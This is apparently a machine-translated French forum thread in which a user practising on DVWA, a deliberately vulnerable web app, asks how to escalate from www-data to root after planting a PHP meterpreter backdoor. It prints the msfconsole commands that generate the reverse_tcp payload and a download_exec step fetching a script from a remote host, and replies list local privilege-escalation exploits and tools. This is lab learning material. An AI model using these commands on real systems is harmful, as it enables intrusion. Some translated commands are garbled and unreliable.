Je déconne avec Kali Linux, MSFConsole et DVWA (Damn Vulnerable Web Application).
J'ai réussi à accéder au système (Raspberry Pi) en créant une porte dérobée PHP et en la téléchargeant via une injection SQL).
Maintenant que j'ai accès au système, le seul problème est que j'exécute en tant que www-data (ne serait-il pas agréable de devenir root pour créer votre propre compte de super-utilisateur?!) Est-il possible d'une manière ou d'une autre d'augmenter les privilèges sous Linux (Raspbaian) en utilisant MSFConsole, BASH (depuis la porte dérobée) ou d'une autre manière?
J'ai essayé d'exécuter "use priv" dans l'invite meterpreter mais l'erreur que j'obtiens est "Impossible de charger l'extension: aucun module du nom ext_server_priv.php n'a été trouvé". Si cela aide, j'exécute l'exploit reverse_tcp en tant que script PHP.
J'ai pu compromettre le système en exécutant ceci est Msfconsole
use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit
J'ai ensuite téléchargé hackme.php sur le serveur Web via le téléchargement de fichier non sécurisé, après avoir fait cela, j'ai ensuite parcouru le fichier téléchargé.
Nous remercions cette vidéo de m'avoir donné le code ci-dessus. (J'ai dû utiliser la fonction generate au lieu de msfpayload car cette fonctionnalité a été déplacée car elle est obsolète.)
À ce stade, vous avez atteint les bases d'un compromis sur le système et vous êtes sur la deuxième phase commune d'exploitation qui est l'escalade de privilèges.
La façon exacte dont vous pouvez y parvenir dépend beaucoup du système en question, du code qui y est installé et de sa configuration. Quelques options à rechercher pour obtenir une élévation de privilèges sur un système Linux
Autres éléments qui s'appliquent davantage aux tests de sécurité "réels" mais qui ne s'appliquent probablement pas à votre situation
Selon la documentation de metasploit, l'utilisateur priv est un module disponible uniquement pour le compteur de mesure Windows natif (pas pour les autres compteur).
Vous voulez probablement vous pencher sur l'escalade de privilèges Unix, que je ne connais pas. Je ne pense pas qu'il y ait un module automatisé pour metasploit qui ferait ça ...
Bonne chance ;)
Vous pouvez mettre à niveau votre Shell vers un Meterpreter avec des sessions -u <#> puis exécuter des modules de publication (par exemple, post/multi/recon/local_exploit_suggester) ou vous pouvez également prendre une session existante (Meterpreter ou non) et exécuter une escalade de privilèges locale exploiter, par exemple, udev_netlink, sock_sendpage, et al, en définissant la variable SESSION.
Certains modules varient selon le système d'exploitation ou le scénario, certains sont tout simplement difficiles à trouver dans la hiérarchie du framework metasploit. Essayez ce qui suit à partir de mètre mètre:
afficher le message
exécuter post/multi/
<tab><tab>
exécutez post/linux/
<tab><tab>
exécuter exploit/multi/
<tab><tab>
Vous pouvez également exécuter une variété d'outils d'escalade de privilèges en dehors du cadre Metasploit et les lancer dans votre session. Voici deux modules qui contribuent à cet effort:
utiliser post/multi/rassembler/multi_commande
définir la RESSOURCE cmds.rc
utilisez post/linux/manage/download_exec
définir l'URL http://10.0.0.1/cmds.sh
Je vous suggère de préparer un système dans un laboratoire qui correspond aux qualités de votre système cible, par exemple, même système d'exploitation, niveau de correctif, installables, paramètres de configuration, et al. En conservant l'accès root sur cette cible de laboratoire maquette, vous pouvez recréer ce que vous tenterez de faire sur la cible réelle. De nombreux outils d'escalade de privilèges nécessitent un accès root pour les exécuter correctement, par exemple, Nessus et OpenVAS en mode authentifié, CIS-CAT, ovaldi, cvechecker, lynis, unix-privesc-check et enum4linux sont tous d'excellents outils dans ce domaine. espace. D'autres devront être exécutés uniquement sur le système cible réel, comme sucrack ou phrasendrescher. Certaines attaques par escalade de privilèges nécessitent beaucoup plus de planification, telles que l'exploitation des binaires setuid/setgid personnalisés. Le RPi nécessitera probablement un compilateur croisé pour les exploits, et beaucoup peuvent même ne pas fonctionner sauf si vous modifiez les décalages pour fonctionner avec les registres, les opcodes et l'endianness de la plate-forme ARM.